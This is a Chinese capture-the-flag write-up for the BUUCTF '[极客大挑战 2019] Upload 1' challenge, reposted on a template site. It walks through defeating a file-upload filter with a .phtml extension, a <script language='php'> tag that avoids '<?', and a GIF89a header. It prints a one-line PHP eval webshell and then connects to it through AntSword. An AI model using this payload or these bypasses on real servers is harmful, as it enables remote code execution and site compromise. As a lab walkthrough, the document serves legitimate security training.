考点:
- 文件上传黑名单绕过
- 内容绕过
- 目录浏览
文件上传
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-1.png)
1. 测试是黑名单还是白名单
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
所以要寻找黑名单外的php文件:php, php3, php5, php7, phtml都能作为php文件解析
ps:有些服务器默认不解析php3 phhtml等,如phpstudy2018中,需要设置
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-2.png)
.phtml能成功上传
2. 判断是否对内容进行过滤
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-3.png)
发现过滤 <?,而普通的php 木马都会携带<?,我们可以使用js+php进行bypass,这样在shell中就不会携带<?
<script language='php'>@eval($_POST['cmd']);</script>再次提交,提示不是一张图片
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-4.png)
加个gif文件头
GIF89a <script language='php'>@eval($_POST['cmd']);</script>成功上传
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-5.png)
3. 寻找上传的文件位置
页面只提示了上传文件名,未能发现上传的路径
所以尝试是否存在目录浏览,经测试发现/upload目录可以浏览
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-6.png)
找到上传的文件使用蚁剑连接
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-7.png)
文章来源:https://www.toymoban.com/news/detail-440802.html
![BUUFCTF—[极客大挑战 2019]Upload 1](https://imgs.yssmx.com/Uploads/2023/05/440802-8.png)
文章来源地址https://www.toymoban.com/news/detail-440802.html
到了这里,关于BUUFCTF—[极客大挑战 2019]Upload 1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![BUUCTF [极客大挑战 2019]BuyFlag1](https://imgs.yssmx.com/Uploads/2024/01/413348-1.png)
![[极客大挑战 2019]PHP1-超详细](https://imgs.yssmx.com/Uploads/2024/01/401508-1.png)
![BUUCTF [极客大挑战 2019]Knife1](https://imgs.yssmx.com/Uploads/2024/02/705951-1.png)
![[网络安全/CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)](https://imgs.yssmx.com/Uploads/2024/02/742922-1.png)
